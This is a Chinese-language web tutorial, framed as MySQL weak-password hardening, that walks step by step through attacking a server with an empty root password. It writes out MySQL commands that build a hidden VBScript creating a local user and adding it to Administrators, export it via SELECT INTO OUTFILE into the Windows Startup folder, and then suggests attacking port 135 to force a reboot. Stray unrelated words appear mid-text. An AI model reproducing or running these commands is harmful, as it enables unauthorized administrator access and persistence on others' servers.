mysql弱⼝令加强_防⽌mysql⽤户root密码弱⼝令的攻击⽅法1、连接到对⽅MYSQL 服务器
mysql -u root -h 192.168.0.1
< 这个程序在你安装了MYSQL的的BIN⽬录中。
2、让我们来看看服务器中有些什么数据库
mysql>show databases; MYSQL默认安装时会有MYSQL、TEST这两个数据库,如果你看到有其它的数据库那么就是⽤户⾃建的数据库。
values什么意思3、让我们进⼊数据库
mysql>use test; 我们将会进⼊test数据库中。
4、查看我们进⼊数据库中有些什么数据表
mysql>show tables; 默认的情况下,test中没有任何表的存在。
以下为关键的部分
5、在TEST数据库下创建⼀个新的表;
mysql>create table a (cmd text); 好了,我们创建了⼀个新的表,表名为a,表中只存放⼀个字段,字段名为cmd,为text⽂本。
6、在表中插⼊内容
代码如下 复制代码
mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
mysql>insert into a values ("a=wshshell.run ("" /c net user 1 1/add"",0) " );
mysql>insert into a values
("b=wshshell.run ("" /c net localgroup Administrators 1 /add"",0) " );
注意双引号和括号以及后⾯的"0"⼀定要输⼊!我们将⽤这三条命令来建⽴⼀个VBS的脚本程序!  7、好了,现在我们来看看表a中有些什么
mysql>select * from a;我们将会看到表中有三⾏数据,就是我们刚刚输⼊的内容,确认你输⼊的内容⽆误后,我们来到下⼀步
8、输出表为⼀个VBS的脚本⽂件
mysql>select * from a into outfile "c:\docume~1\alluse~1\“开始”菜单\程序\启动\a.vbs"; 我们把我们表中的内容输⼊到启动组中,是⼀个VBS的脚本⽂件!注意""符号。
9、看到这⼤家肯定知道了,就是利⽤MYSQL输出⼀个可执⾏的⽂件⽽已。为什么不⽤BAT呢,因为启动运⾏时会有明显的DOS窗⼝出来,⽽⽤VBS脚本则可以完全隐藏窗⼝且不会有错误提⽰!本来,应该还有⼀句完成脚本后⾃动删除此脚本的,但是中⽂⽬录实在⽆法处理,只有作罢!好了,个⼯具攻击135让服务器重启吧,⼏分钟以后你就是管理员了。
总结:不管你什么时候都需要注意⾃⼰服务器的安全否则就别谈其它应⽤程序了,本⽂章讲述的mysql root密码弱⼝令的攻击只是安全应⽤中的冰⼭⼀解⽽⼰。

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。